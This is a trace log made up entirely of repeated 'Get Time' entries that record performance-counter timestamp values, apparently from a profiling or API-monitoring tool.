Get Time	type = Performance Ctr, time = 23305109738	1	Fn
Get Time	type = Performance Ctr, time = 23305128102	1	Fn
Get Time	type = Performance Ctr, time = 23306762856	1	Fn
Get Time	type = Performance Ctr, time = 23306775816	1	Fn
Get Time	type = Performance Ctr, time = 23357188002	1	Fn
Get Time	type = Performance Ctr, time = 23357204333	1	Fn
Get Time	type = Performance Ctr, time = 23358349348	1	Fn
Get Time	type = Performance Ctr, time = 23358366035	1	Fn
Get Time	type = Performance Ctr, time = 23358390792	1	Fn
Get Time	type = Performance Ctr, time = 23358405743	1	Fn
Get Time	type = Performance Ctr, time = 23359902396	1	Fn
Get Time	type = Performance Ctr, time = 23359918401	1	Fn
Get Time	type = Performance Ctr, time = 23363021927	1	Fn
Get Time	type = Performance Ctr, time = 23363037656	1	Fn
Get Time	type = Performance Ctr, time = 23366187446	1	Fn
Get Time	type = Performance Ctr, time = 23366203668	1	Fn
Get Time	type = Performance Ctr, time = 23369279471	1	Fn
Get Time	type = Performance Ctr, time = 23369297783	1	Fn
Get Time	type = Performance Ctr, time = 23372409899	1	Fn
Get Time	type = Performance Ctr, time = 23372426071	1	Fn
Get Time	type = Performance Ctr, time = 23373975981	1	Fn
Get Time	type = Performance Ctr, time = 23373992355	1	Fn
Get Time	type = Performance Ctr, time = 23377120452	1	Fn
Get Time	type = Performance Ctr, time = 23377136331	1	Fn
Get Time	type = Performance Ctr, time = 23378659199	1	Fn
Get Time	type = Performance Ctr, time = 23378675043	1	Fn
Get Time	type = Performance Ctr, time = 23380289643	1	Fn
Get Time	type = Performance Ctr, time = 23380305812	1	Fn
Get Time	type = Performance Ctr, time = 23383347215	1	Fn
Get Time	type = Performance Ctr, time = 23383363258	1	Fn
Get Time	type = Performance Ctr, time = 23384905021	1	Fn
Get Time	type = Performance Ctr, time = 23384920907	1	Fn
Get Time	type = Performance Ctr, time = 23388050342	1	Fn
Get Time	type = Performance Ctr, time = 23388066419	1	Fn
Get Time	type = Performance Ctr, time = 23391151527	1	Fn
Get Time	type = Performance Ctr, time = 23391167011	1	Fn
Get Time	type = Performance Ctr, time = 23392732130	1	Fn
Get Time	type = Performance Ctr, time = 23392747230	1	Fn
Get Time	type = Performance Ctr, time = 23394278678	1	Fn
Get Time	type = Performance Ctr, time = 23394293855	1	Fn
Get Time	type = Performance Ctr, time = 23397392598	1	Fn
Get Time	type = Performance Ctr, time = 23397407927	1	Fn
Get Time	type = Performance Ctr, time = 23400688148	1	Fn
Get Time	type = Performance Ctr, time = 23400705879	1	Fn
Get Time	type = Performance Ctr, time = 23402109180	1	Fn
Get Time	type = Performance Ctr, time = 23402125218	1	Fn
Get Time	type = Performance Ctr, time = 23405238851	1	Fn
Get Time	type = Performance Ctr, time = 23405254982	1	Fn
Get Time	type = Performance Ctr, time = 23406779219	1	Fn
Get Time	type = Performance Ctr, time = 23406794316	1	Fn
Get Time	type = Performance Ctr, time = 23408445244	1	Fn
Get Time	type = Performance Ctr, time = 23408461209	1	Fn
Get Time	type = Performance Ctr, time = 23411479263	1	Fn
Get Time	type = Performance Ctr, time = 23411493646	1	Fn
Get Time	type = Performance Ctr, time = 23418409184	1	Fn
Get Time	type = Performance Ctr, time = 23418428638	1	Fn
Get Time	type = Performance Ctr, time = 23418458016	1	Fn
Get Time	type = Performance Ctr, time = 23418469577	1	Fn
Get Time	type = Performance Ctr, time = 23419278811	1	Fn
Get Time	type = Performance Ctr, time = 23419291401	1	Fn
Get Time	type = Performance Ctr, time = 23420844991	1	Fn
Get Time	type = Performance Ctr, time = 23420860135	1	Fn
Get Time	type = Performance Ctr, time = 23423969935	1	Fn
Get Time	type = Performance Ctr, time = 23423986602	1	Fn
Get Time	type = Performance Ctr, time = 23425542014	1	Fn
Get Time	type = Performance Ctr, time = 23425557557	1	Fn
Get Time	type = Performance Ctr, time = 23428681671	1	Fn
Get Time	type = Performance Ctr, time = 23428694881	1	Fn
Get Time	type = Performance Ctr, time = 23430219916	1	Fn
Get Time	type = Performance Ctr, time = 23430235420	1	Fn
Get Time	type = Performance Ctr, time = 23433328831	1	Fn
Get Time	type = Performance Ctr, time = 23433341354	1	Fn
Get Time	type = Performance Ctr, time = 23434902955	1	Fn
Get Time	type = Performance Ctr, time = 23434916034	1	Fn
Get Time	type = Performance Ctr, time = 23438044188	1	Fn
Get Time	type = Performance Ctr, time = 23438058068	1	Fn
Get Time	type = Performance Ctr, time = 23508501434	1	Fn
Get Time	type = Performance Ctr, time = 23508516348	1	Fn
Get Time	type = Performance Ctr, time = 23513748307	1	Fn
Get Time	type = Performance Ctr, time = 23513762988	1	Fn
Get Time	type = Performance Ctr, time = 23513787645	1	Fn
Get Time	type = Performance Ctr, time = 23513797931	1	Fn
Get Time	type = Performance Ctr, time = 23514585735	1	Fn
Get Time	type = Performance Ctr, time = 23514599594	1	Fn
Get Time	type = Performance Ctr, time = 23516158481	1	Fn
Get Time	type = Performance Ctr, time = 23516170888	1	Fn
Get Time	type = Performance Ctr, time = 23517755270	1	Fn
Get Time	type = Performance Ctr, time = 23517769953	1	Fn
Get Time	type = Performance Ctr, time = 23520835424	1	Fn
Get Time	type = Performance Ctr, time = 23520849620	1	Fn
Get Time	type = Performance Ctr, time = 23522410770	1	Fn
Get Time	type = Performance Ctr, time = 23522425592	1	Fn
Get Time	type = Performance Ctr, time = 23524349695	1	Fn
Get Time	type = Performance Ctr, time = 23524413948	1	Fn
Get Time	type = Performance Ctr, time = 23524498158	1	Fn
Get Time	type = Performance Ctr, time = 23525533885	1	Fn
Get Time	type = Performance Ctr, time = 23525543645	1	Fn
Get Time	type = Performance Ctr, time = 23528662515	1	Fn
Get Time	type = Performance Ctr, time = 23528677475	1	Fn
Get Time	type = Performance Ctr, time = 23530221396	1	Fn
Get Time	type = Performance Ctr, time = 23530236515	1	Fn
Get Time	type = Performance Ctr, time = 23533337359	1	Fn
Get Time	type = Performance Ctr, time = 23533351484	1	Fn
Get Time	type = Performance Ctr, time = 23534930220	1	Fn
Get Time	type = Performance Ctr, time = 23534944504	1	Fn
Get Time	type = Performance Ctr, time = 23534971694	1	Fn
Get Time	type = Performance Ctr, time = 23536464493	1	Fn
Get Time	type = Performance Ctr, time = 23536476999	1	Fn
Get Time	type = Performance Ctr, time = 23539609099	1	Fn
Get Time	type = Performance Ctr, time = 23539623546	1	Fn
Get Time	type = Performance Ctr, time = 23542719748	1	Fn
Get Time	type = Performance Ctr, time = 23542734987	1	Fn
Get Time	type = Performance Ctr, time = 23544287726	1	Fn
Get Time	type = Performance Ctr, time = 23544302476	1	Fn
Get Time	type = Performance Ctr, time = 23547416911	1	Fn
Get Time	type = Performance Ctr, time = 23547431940	1	Fn
Get Time	type = Performance Ctr, time = 23550559207	1	Fn
Get Time	type = Performance Ctr, time = 23550574248	1	Fn
Get Time	type = Performance Ctr, time = 23553718053	1	Fn
Get Time	type = Performance Ctr, time = 23553733134	1	Fn
Get Time	type = Performance Ctr, time = 23555214777	1	Fn
Get Time	type = Performance Ctr, time = 23555226828	1	Fn
Get Time	type = Performance Ctr, time = 23558345224	1	Fn
Get Time	type = Performance Ctr, time = 23558359822	1	Fn
Get Time	type = Performance Ctr, time = 23559918260	1	Fn
Get Time	type = Performance Ctr, time = 23559932238	1	Fn
Get Time	type = Performance Ctr, time = 23563035962	1	Fn
Get Time	type = Performance Ctr, time = 23563051412	1	Fn
Get Time	type = Performance Ctr, time = 23564647609	1	Fn
Get Time	type = Performance Ctr, time = 23564661491	1	Fn
Get Time	type = Performance Ctr, time = 23567726622	1	Fn
Get Time	type = Performance Ctr, time = 23567737136	1	Fn
Get Time	type = Performance Ctr, time = 23569273774	1	Fn
Get Time	type = Performance Ctr, time = 23569286500	1	Fn
Get Time	type = Performance Ctr, time = 23571128689	1	Fn
Get Time	type = Performance Ctr, time = 23571142664	1	Fn
Get Time	type = Performance Ctr, time = 23573972691	1	Fn
Get Time	type = Performance Ctr, time = 23573986387	1	Fn
Get Time	type = Performance Ctr, time = 23575527135	1	Fn
Get Time	type = Performance Ctr, time = 23575541278	1	Fn
Get Time	type = Performance Ctr, time = 23578656001	1	Fn
Get Time	type = Performance Ctr, time = 23578669995	1	Fn
Get Time	type = Performance Ctr, time = 23583248421	1	Fn
Get Time	type = Performance Ctr, time = 23583262801	1	Fn
Get Time	type = Performance Ctr, time = 23583339847	1	Fn
Get Time	type = Performance Ctr, time = 23583351548	1	Fn
Get Time	type = Performance Ctr, time = 23586471766	1	Fn
Get Time	type = Performance Ctr, time = 23586485642	1	Fn
Get Time	type = Performance Ctr, time = 23588029811	1	Fn
Get Time	type = Performance Ctr, time = 23588044644	1	Fn
Get Time	type = Performance Ctr, time = 23589598297	1	Fn
Get Time	type = Performance Ctr, time = 23589612212	1	Fn
Get Time	type = Performance Ctr, time = 23592723087	1	Fn
Get Time	type = Performance Ctr, time = 23592737764	1	Fn
Get Time	type = Performance Ctr, time = 23595848842	1	Fn
Get Time	type = Performance Ctr, time = 23595863739	1	Fn
Get Time	type = Performance Ctr, time = 23598964604	1	Fn
Get Time	type = Performance Ctr, time = 23598977197	1	Fn
Get Time	type = Performance Ctr, time = 23602088694	1	Fn
Get Time	type = Performance Ctr, time = 23602101308	1	Fn
Get Time	type = Performance Ctr, time = 23603877005	1	Fn
Get Time	type = Performance Ctr, time = 23603891176	1	Fn
Get Time	type = Performance Ctr, time = 23606777943	1	Fn
Get Time	type = Performance Ctr, time = 23606789874	1	Fn
Get Time	type = Performance Ctr, time = 23610135075	1	Fn
Get Time	type = Performance Ctr, time = 23610147634	1	Fn
Get Time	type = Performance Ctr, time = 23613027248	1	Fn
Get Time	type = Performance Ctr, time = 23613040329	1	Fn
Get Time	type = Performance Ctr, time = 23616166403	1	Fn
Get Time	type = Performance Ctr, time = 23616175327	1	Fn
Get Time	type = Performance Ctr, time = 23619275619	1	Fn
Get Time	type = Performance Ctr, time = 23619287853	1	Fn
Get Time	type = Performance Ctr, time = 23620842409	1	Fn
Get Time	type = Performance Ctr, time = 23620855503	1	Fn
Get Time	type = Performance Ctr, time = 23623957177	1	Fn
Get Time	type = Performance Ctr, time = 23623970324	1	Fn
Get Time	type = Performance Ctr, time = 23625525194	1	Fn
Get Time	type = Performance Ctr, time = 23625534808	1	Fn
Get Time	type = Performance Ctr, time = 23628652528	1	Fn
Get Time	type = Performance Ctr, time = 23628664826	1	Fn
Get Time	type = Performance Ctr, time = 23631773808	1	Fn
Get Time	type = Performance Ctr, time = 23631786792	1	Fn
Get Time	type = Performance Ctr, time = 23633330783	1	Fn
Get Time	type = Performance Ctr, time = 23633343423	1	Fn
Get Time	type = Performance Ctr, time = 23634917967	1	Fn
Get Time	type = Performance Ctr, time = 23634930806	1	Fn
Get Time	type = Performance Ctr, time = 23638045018	1	Fn
Get Time	type = Performance Ctr, time = 23638057369	1	Fn
Get Time	type = Performance Ctr, time = 23639581250	1	Fn
Get Time	type = Performance Ctr, time = 23639593679	1	Fn
Get Time	type = Performance Ctr, time = 23641160098	1	Fn
Get Time	type = Performance Ctr, time = 23641173900	1	Fn
Get Time	type = Performance Ctr, time = 23642715776	1	Fn
Get Time	type = Performance Ctr, time = 23642727382	1	Fn
Get Time	type = Performance Ctr, time = 23645836681	1	Fn
Get Time	type = Performance Ctr, time = 23645848669	1	Fn
Get Time	type = Performance Ctr, time = 23647415284	1	Fn
Get Time	type = Performance Ctr, time = 23647423923	1	Fn
Get Time	type = Performance Ctr, time = 23649214996	1	Fn
Get Time	type = Performance Ctr, time = 23649226313	1	Fn
Get Time	type = Performance Ctr, time = 23652091196	1	Fn
Get Time	type = Performance Ctr, time = 23652104186	1	Fn
Get Time	type = Performance Ctr, time = 23653645508	1	Fn
Get Time	type = Performance Ctr, time = 23653658280	1	Fn
Get Time	type = Performance Ctr, time = 23655225778	1	Fn
Get Time	type = Performance Ctr, time = 23655240288	1	Fn
Get Time	type = Performance Ctr, time = 23658342624	1	Fn
Get Time	type = Performance Ctr, time = 23658355736	1	Fn
Get Time	type = Performance Ctr, time = 23659908202	1	Fn
Get Time	type = Performance Ctr, time = 23659921291	1	Fn
Get Time	type = Performance Ctr, time = 23663027150	1	Fn
Get Time	type = Performance Ctr, time = 23663042334	1	Fn
Get Time	type = Performance Ctr, time = 23666156084	1	Fn
Get Time	type = Performance Ctr, time = 23666168392	1	Fn
Get Time	type = Performance Ctr, time = 23667722639	1	Fn
Get Time	type = Performance Ctr, time = 23667735311	1	Fn
Get Time	type = Performance Ctr, time = 23670852785	1	Fn
Get Time	type = Performance Ctr, time = 23670867701	1	Fn
Get Time	type = Performance Ctr, time = 23673970152	1	Fn
Get Time	type = Performance Ctr, time = 23673984289	1	Fn
Get Time	type = Performance Ctr, time = 23677090150	1	Fn
Get Time	type = Performance Ctr, time = 23677105413	1	Fn
Get Time	type = Performance Ctr, time = 23682159180	1	Fn
Get Time	type = Performance Ctr, time = 23682175665	1	Fn
Get Time	type = Performance Ctr, time = 23683338827	1	Fn
Get Time	type = Performance Ctr, time = 23683355753	1	Fn
Get Time	type = Performance Ctr, time = 23686462783	1	Fn
Get Time	type = Performance Ctr, time = 23686477568	1	Fn
Get Time	type = Performance Ctr, time = 23688224575	1	Fn
Get Time	type = Performance Ctr, time = 23688235592	1	Fn
Get Time	type = Performance Ctr, time = 23691152299	1	Fn
Get Time	type = Performance Ctr, time = 23691161336	1	Fn
Get Time	type = Performance Ctr, time = 23692723981	1	Fn
Get Time	type = Performance Ctr, time = 23692736023	1	Fn
Get Time	type = Performance Ctr, time = 23695830228	1	Fn
Get Time	type = Performance Ctr, time = 23695842991	1	Fn
Get Time	type = Performance Ctr, time = 23697403537	1	Fn
Get Time	type = Performance Ctr, time = 23697416000	1	Fn
Get Time	type = Performance Ctr, time = 23700525150	1	Fn
Get Time	type = Performance Ctr, time = 23700534047	1	Fn
Get Time	type = Performance Ctr, time = 23703663803	1	Fn
Get Time	type = Performance Ctr, time = 23703675740	1	Fn
Get Time	type = Performance Ctr, time = 23705210572	1	Fn
Get Time	type = Performance Ctr, time = 23705226416	1	Fn
Get Time	type = Performance Ctr, time = 23708838829	1	Fn
Get Time	type = Performance Ctr, time = 23708851813	1	Fn
Get Time	type = Performance Ctr, time = 23709917074	1	Fn
Get Time	type = Performance Ctr, time = 23709930976	1	Fn
Get Time	type = Performance Ctr, time = 23713025997	1	Fn
Get Time	type = Performance Ctr, time = 23713038502	1	Fn
Get Time	type = Performance Ctr, time = 23716158281	1	Fn
Get Time	type = Performance Ctr, time = 23716173584	1	Fn
Get Time	type = Performance Ctr, time = 23717714694	1	Fn
Get Time	type = Performance Ctr, time = 23717729193	1	Fn
Get Time	type = Performance Ctr, time = 23719281558	1	Fn
Get Time	type = Performance Ctr, time = 23719296700	1	Fn
Get Time	type = Performance Ctr, time = 23720966736	1	Fn
Get Time	type = Performance Ctr, time = 23720980618	1	Fn
Get Time	type = Performance Ctr, time = 23723969241	1	Fn
Get Time	type = Performance Ctr, time = 23723984525	1	Fn
Get Time	type = Performance Ctr, time = 23727094450	1	Fn
Get Time	type = Performance Ctr, time = 23727109527	1	Fn
Get Time	type = Performance Ctr, time = 23728656929	1	Fn
Get Time	type = Performance Ctr, time = 23728671616	1	Fn
Get Time	type = Performance Ctr, time = 23731774997	1	Fn
Get Time	type = Performance Ctr, time = 23731790157	1	Fn
Get Time	type = Performance Ctr, time = 23733347488	1	Fn
Get Time	type = Performance Ctr, time = 23733363263	1	Fn
Get Time	type = Performance Ctr, time = 23736492300	1	Fn
Get Time	type = Performance Ctr, time = 23736507708	1	Fn
Get Time	type = Performance Ctr, time = 23738037563	1	Fn
Get Time	type = Performance Ctr, time = 23738052231	1	Fn
Get Time	type = Performance Ctr, time = 23831217632	1	Fn
Get Time	type = Performance Ctr, time = 23831230962	1	Fn
Get Time	type = Performance Ctr, time = 23838454431	1	Fn
Get Time	type = Performance Ctr, time = 23838468064	1	Fn
Get Time	type = Performance Ctr, time = 23838487975	1	Fn
Get Time	type = Performance Ctr, time = 23838498323	1	Fn
Get Time	type = Performance Ctr, time = 23841148052	1	Fn
Get Time	type = Performance Ctr, time = 23841161192	1	Fn
Get Time	type = Performance Ctr, time = 23844270423	1	Fn
Get Time	type = Performance Ctr, time = 23844298476	1	Fn
Get Time	type = Performance Ctr, time = 23845845600	1	Fn
Get Time	type = Performance Ctr, time = 23845862480	1	Fn
Get Time	type = Performance Ctr, time = 23848953478	1	Fn
Get Time	type = Performance Ctr, time = 23848967112	1	Fn
Get Time	type = Performance Ctr, time = 23850536208	1	Fn
Get Time	type = Performance Ctr, time = 23850551709	1	Fn
Get Time	type = Performance Ctr, time = 23853641801	1	Fn
Get Time	type = Performance Ctr, time = 23853651521	1	Fn
Get Time	type = Performance Ctr, time = 23855196429	1	Fn
Get Time	type = Performance Ctr, time = 23855209022	1	Fn
Get Time	type = Performance Ctr, time = 23856770979	1	Fn
Get Time	type = Performance Ctr, time = 23856783416	1	Fn
Get Time	type = Performance Ctr, time = 23858327384	1	Fn
Get Time	type = Performance Ctr, time = 23858340472	1	Fn
Get Time	type = Performance Ctr, time = 23861453020	1	Fn
Get Time	type = Performance Ctr, time = 23861465767	1	Fn
Get Time	type = Performance Ctr, time = 23863049288	1	Fn
Get Time	type = Performance Ctr, time = 23863060440	1	Fn
Get Time	type = Performance Ctr, time = 23866143828	1	Fn
Get Time	type = Performance Ctr, time = 23866155726	1	Fn
Get Time	type = Performance Ctr, time = 23871884439	1	Fn
Get Time	type = Performance Ctr, time = 23871897296	1	Fn
Get Time	type = Performance Ctr, time = 23871918102	1	Fn
Get Time	type = Performance Ctr, time = 23871925349	1	Fn
Get Time	type = Performance Ctr, time = 23873969252	1	Fn
Get Time	type = Performance Ctr, time = 23873982027	1	Fn
Get Time	type = Performance Ctr, time = 23875519465	1	Fn
Get Time	type = Performance Ctr, time = 23875529803	1	Fn
Get Time	type = Performance Ctr, time = 23877075703	1	Fn
Get Time	type = Performance Ctr, time = 23877087422	1	Fn
Get Time	type = Performance Ctr, time = 23880196461	1	Fn
Get Time	type = Performance Ctr, time = 23880209108	1	Fn
Get Time	type = Performance Ctr, time = 23881778562	1	Fn
Get Time	type = Performance Ctr, time = 23881790126	1	Fn
Get Time	type = Performance Ctr, time = 23883325889	1	Fn
Get Time	type = Performance Ctr, time = 23883338503	1	Fn
Get Time	type = Performance Ctr, time = 23886444636	1	Fn
Get Time	type = Performance Ctr, time = 23886455774	1	Fn
Get Time	type = Performance Ctr, time = 23888020809	1	Fn
Get Time	type = Performance Ctr, time = 23888159102	1	Fn
Get Time	type = Performance Ctr, time = 23889643817	1	Fn
Get Time	type = Performance Ctr, time = 23889656682	1	Fn
Get Time	type = Performance Ctr, time = 23891296482	1	Fn
Get Time	type = Performance Ctr, time = 23891310224	1	Fn
Get Time	type = Performance Ctr, time = 23894271770	1	Fn
Get Time	type = Performance Ctr, time = 23894284354	1	Fn
Get Time	type = Performance Ctr, time = 23895842309	1	Fn
Get Time	type = Performance Ctr, time = 23895853356	1	Fn
Get Time	type = Performance Ctr, time = 23898953996	1	Fn
Get Time	type = Performance Ctr, time = 23898966138	1	Fn
Get Time	type = Performance Ctr, time = 23900521270	1	Fn
Get Time	type = Performance Ctr, time = 23900533243	1	Fn
Get Time	type = Performance Ctr, time = 23902087720	1	Fn
Get Time	type = Performance Ctr, time = 23902100716	1	Fn
Get Time	type = Performance Ctr, time = 23905209519	1	Fn
Get Time	type = Performance Ctr, time = 23905222402	1	Fn
Get Time	type = Performance Ctr, time = 23906790792	1	Fn
Get Time	type = Performance Ctr, time = 23906802183	1	Fn
Get Time	type = Performance Ctr, time = 23909950151	1	Fn
Get Time	type = Performance Ctr, time = 23909964576	1	Fn
Get Time	type = Performance Ctr, time = 23912979213	1	Fn
Get Time	type = Performance Ctr, time = 23912997897	1	Fn
Get Time	type = Performance Ctr, time = 23916082342	1	Fn
Get Time	type = Performance Ctr, time = 23916094607	1	Fn
Get Time	type = Performance Ctr, time = 23919207583	1	Fn
Get Time	type = Performance Ctr, time = 23919220015	1	Fn
Get Time	type = Performance Ctr, time = 23922347973	1	Fn
Get Time	type = Performance Ctr, time = 23922360678	1	Fn
Get Time	type = Performance Ctr, time = 23925442949	1	Fn
Get Time	type = Performance Ctr, time = 23925455122	1	Fn
Get Time	type = Performance Ctr, time = 23927612697	1	Fn
Get Time	type = Performance Ctr, time = 23927625278	1	Fn
Get Time	type = Performance Ctr, time = 23929185120	1	Fn
Get Time	type = Performance Ctr, time = 23929197857	1	Fn
Get Time	type = Performance Ctr, time = 23932334586	1	Fn
Get Time	type = Performance Ctr, time = 23932347883	1	Fn
Get Time	type = Performance Ctr, time = 23933874658	1	Fn
Get Time	type = Performance Ctr, time = 23933887127	1	Fn
Get Time	type = Performance Ctr, time = 23936993864	1	Fn
Get Time	type = Performance Ctr, time = 23937004069	1	Fn
Get Time	type = Performance Ctr, time = 23940123779	1	Fn
Get Time	type = Performance Ctr, time = 23940136520	1	Fn
Get Time	type = Performance Ctr, time = 23941676552	1	Fn
Get Time	type = Performance Ctr, time = 23941689212	1	Fn
Get Time	type = Performance Ctr, time = 23943241352	1	Fn
Get Time	type = Performance Ctr, time = 23943255451	1	Fn
Get Time	type = Performance Ctr, time = 23946366330	1	Fn
Get Time	type = Performance Ctr, time = 23946381149	1	Fn
Get Time	type = Performance Ctr, time = 23947939682	1	Fn
Get Time	type = Performance Ctr, time = 23947954821	1	Fn
Get Time	type = Performance Ctr, time = 23951059217	1	Fn
Get Time	type = Performance Ctr, time = 23951073101	1	Fn
Get Time	type = Performance Ctr, time = 23952619779	1	Fn
Get Time	type = Performance Ctr, time = 23952634635	1	Fn
Get Time	type = Performance Ctr, time = 23955734255	1	Fn
Get Time	type = Performance Ctr, time = 23955747336	1	Fn
Get Time	type = Performance Ctr, time = 23958868858	1	Fn
Get Time	type = Performance Ctr, time = 23958884310	1	Fn
Get Time	type = Performance Ctr, time = 23960458770	1	Fn
Get Time	type = Performance Ctr, time = 23960472091	1	Fn
Get Time	type = Performance Ctr, time = 23963556258	1	Fn
Get Time	type = Performance Ctr, time = 23963569677	1	Fn
Get Time	type = Performance Ctr, time = 23966689945	1	Fn
Get Time	type = Performance Ctr, time = 23966703482	1	Fn
Get Time	type = Performance Ctr, time = 23972027898	1	Fn
Get Time	type = Performance Ctr, time = 23972043048	1	Fn
Get Time	type = Performance Ctr, time = 23972070076	1	Fn
Get Time	type = Performance Ctr, time = 23972078870	1	Fn
Get Time	type = Performance Ctr, time = 23974482313	1	Fn
Get Time	type = Performance Ctr, time = 23974495397	1	Fn
Get Time	type = Performance Ctr, time = 23976053149	1	Fn
Get Time	type = Performance Ctr, time = 23976065975	1	Fn
Get Time	type = Performance Ctr, time = 23979181225	1	Fn
Get Time	type = Performance Ctr, time = 23979194053	1	Fn
Get Time	type = Performance Ctr, time = 23982329075	1	Fn
Get Time	type = Performance Ctr, time = 23982343538	1	Fn
Get Time	type = Performance Ctr, time = 23983869399	1	Fn
Get Time	type = Performance Ctr, time = 23983884183	1	Fn
Get Time	type = Performance Ctr, time = 23986984266	1	Fn
Get Time	type = Performance Ctr, time = 23986998022	1	Fn
Get Time	type = Performance Ctr, time = 23988555616	1	Fn
Get Time	type = Performance Ctr, time = 23988568542	1	Fn
Get Time	type = Performance Ctr, time = 23991769458	1	Fn
Get Time	type = Performance Ctr, time = 23991782378	1	Fn
Get Time	type = Performance Ctr, time = 23993262620	1	Fn
Get Time	type = Performance Ctr, time = 23993276538	1	Fn
Get Time	type = Performance Ctr, time = 23996359868	1	Fn
Get Time	type = Performance Ctr, time = 23996372686	1	Fn
Get Time	type = Performance Ctr, time = 23999492031	1	Fn
Get Time	type = Performance Ctr, time = 23999506264	1	Fn
Get Time	type = Performance Ctr, time = 24002608909	1	Fn
Get Time	type = Performance Ctr, time = 24002622074	1	Fn
Get Time	type = Performance Ctr, time = 24004198950	1	Fn
Get Time	type = Performance Ctr, time = 24004212310	1	Fn
Get Time	type = Performance Ctr, time = 24005740526	1	Fn
Get Time	type = Performance Ctr, time = 24005754936	1	Fn
Get Time	type = Performance Ctr, time = 24008859804	1	Fn
Get Time	type = Performance Ctr, time = 24008872856	1	Fn
Get Time	type = Performance Ctr, time = 24010429071	1	Fn
Get Time	type = Performance Ctr, time = 24010441608	1	Fn
Get Time	type = Performance Ctr, time = 24011991120	1	Fn
Get Time	type = Performance Ctr, time = 24012004555	1	Fn
Get Time	type = Performance Ctr, time = 24015129325	1	Fn
Get Time	type = Performance Ctr, time = 24015141802	1	Fn
Get Time	type = Performance Ctr, time = 24018242237	1	Fn
Get Time	type = Performance Ctr, time = 24018256767	1	Fn
Get Time	type = Performance Ctr, time = 24021360227	1	Fn
Get Time	type = Performance Ctr, time = 24021373046	1	Fn
Get Time	type = Performance Ctr, time = 24022935537	1	Fn
Get Time	type = Performance Ctr, time = 24022949815	1	Fn
Get Time	type = Performance Ctr, time = 24024491894	1	Fn
Get Time	type = Performance Ctr, time = 24024504052	1	Fn
Get Time	type = Performance Ctr, time = 24027612517	1	Fn
Get Time	type = Performance Ctr, time = 24027625851	1	Fn
Get Time	type = Performance Ctr, time = 24031233490	1	Fn
Get Time	type = Performance Ctr, time = 24031247186	1	Fn
Get Time	type = Performance Ctr, time = 24033870143	1	Fn
Get Time	type = Performance Ctr, time = 24033883511	1	Fn
Get Time	type = Performance Ctr, time = 24037003956	1	Fn
Get Time	type = Performance Ctr, time = 24037016840	1	Fn
Get Time	type = Performance Ctr, time = 24040108014	1	Fn
Get Time	type = Performance Ctr, time = 24040120847	1	Fn
Get Time	type = Performance Ctr, time = 24043234347	1	Fn
Get Time	type = Performance Ctr, time = 24043246709	1	Fn
Get Time	type = Performance Ctr, time = 24044806083	1	Fn
Get Time	type = Performance Ctr, time = 24044820735	1	Fn
Get Time	type = Performance Ctr, time = 24046359952	1	Fn
Get Time	type = Performance Ctr, time = 24046372636	1	Fn
Get Time	type = Performance Ctr, time = 24047961738	1	Fn
Get Time	type = Performance Ctr, time = 24047977013	1	Fn
Get Time	type = Performance Ctr, time = 24051056414	1	Fn
Get Time	type = Performance Ctr, time = 24051069075	1	Fn
Get Time	type = Performance Ctr, time = 24052612584	1	Fn
Get Time	type = Performance Ctr, time = 24052625539	1	Fn
Get Time	type = Performance Ctr, time = 24055734259	1	Fn
Get Time	type = Performance Ctr, time = 24055746834	1	Fn
Get Time	type = Performance Ctr, time = 24058886037	1	Fn
Get Time	type = Performance Ctr, time = 24058900849	1	Fn
Get Time	type = Performance Ctr, time = 24060429306	1	Fn
Get Time	type = Performance Ctr, time = 24060442288	1	Fn
Get Time	type = Performance Ctr, time = 24063562750	1	Fn
Get Time	type = Performance Ctr, time = 24063577386	1	Fn
Get Time	type = Performance Ctr, time = 24066676539	1	Fn
Get Time	type = Performance Ctr, time = 24066689351	1	Fn
Get Time	type = Performance Ctr, time = 24074501814	1	Fn
Get Time	type = Performance Ctr, time = 24074514611	1	Fn
Get Time	type = Performance Ctr, time = 24074535044	1	Fn
Get Time	type = Performance Ctr, time = 24074542239	1	Fn
Get Time	type = Performance Ctr, time = 24077604278	1	Fn
Get Time	type = Performance Ctr, time = 24077615189	1	Fn
Get Time	type = Performance Ctr, time = 24080734109	1	Fn
Get Time	type = Performance Ctr, time = 24080745468	1	Fn
Get Time	type = Performance Ctr, time = 24083859250	1	Fn
Get Time	type = Performance Ctr, time = 24083871635	1	Fn
Get Time	type = Performance Ctr, time = 24085437203	1	Fn
Get Time	type = Performance Ctr, time = 24085450740	1	Fn
Get Time	type = Performance Ctr, time = 24088555045	1	Fn
Get Time	type = Performance Ctr, time = 24088567760	1	Fn
Get Time	type = Performance Ctr, time = 24091680268	1	Fn
Get Time	type = Performance Ctr, time = 24091693278	1	Fn
Get Time	type = Performance Ctr, time = 24093229129	1	Fn
Get Time	type = Performance Ctr, time = 24093241538	1	Fn
Get Time	type = Performance Ctr, time = 24094939490	1	Fn
Get Time	type = Performance Ctr, time = 24094952906	1	Fn
Get Time	type = Performance Ctr, time = 24097926613	1	Fn
Get Time	type = Performance Ctr, time = 24097939346	1	Fn
Get Time	type = Performance Ctr, time = 24099484533	1	Fn
Get Time	type = Performance Ctr, time = 24099497989	1	Fn
Get Time	type = Performance Ctr, time = 24101059826	1	Fn
Get Time	type = Performance Ctr, time = 24101072843	1	Fn
Get Time	type = Performance Ctr, time = 24104185784	1	Fn
Get Time	type = Performance Ctr, time = 24104198450	1	Fn
Get Time	type = Performance Ctr, time = 24107303375	1	Fn
Get Time	type = Performance Ctr, time = 24107316427	1	Fn
Get Time	type = Performance Ctr, time = 24110426045	1	Fn
Get Time	type = Performance Ctr, time = 24110438583	1	Fn
Get Time	type = Performance Ctr, time = 24111987029	1	Fn
Get Time	type = Performance Ctr, time = 24111998392	1	Fn
Get Time	type = Performance Ctr, time = 24115106798	1	Fn
Get Time	type = Performance Ctr, time = 24115119861	1	Fn
Get Time	type = Performance Ctr, time = 24116677146	1	Fn
Get Time	type = Performance Ctr, time = 24116688672	1	Fn
Get Time	type = Performance Ctr, time = 24119801224	1	Fn
Get Time	type = Performance Ctr, time = 24119814725	1	Fn
Get Time	type = Performance Ctr, time = 24121360876	1	Fn
Get Time	type = Performance Ctr, time = 24121374203	1	Fn
Get Time	type = Performance Ctr, time = 24124494415	1	Fn
Get Time	type = Performance Ctr, time = 24124503529	1	Fn
Get Time	type = Performance Ctr, time = 24126055019	1	Fn
Get Time	type = Performance Ctr, time = 24126068241	1	Fn
Get Time	type = Performance Ctr, time = 24127610471	1	Fn
Get Time	type = Performance Ctr, time = 24127623891	1	Fn
Get Time	type = Performance Ctr, time = 24129180722	1	Fn
Get Time	type = Performance Ctr, time = 24129194123	1	Fn
Get Time	type = Performance Ctr, time = 24132320158	1	Fn
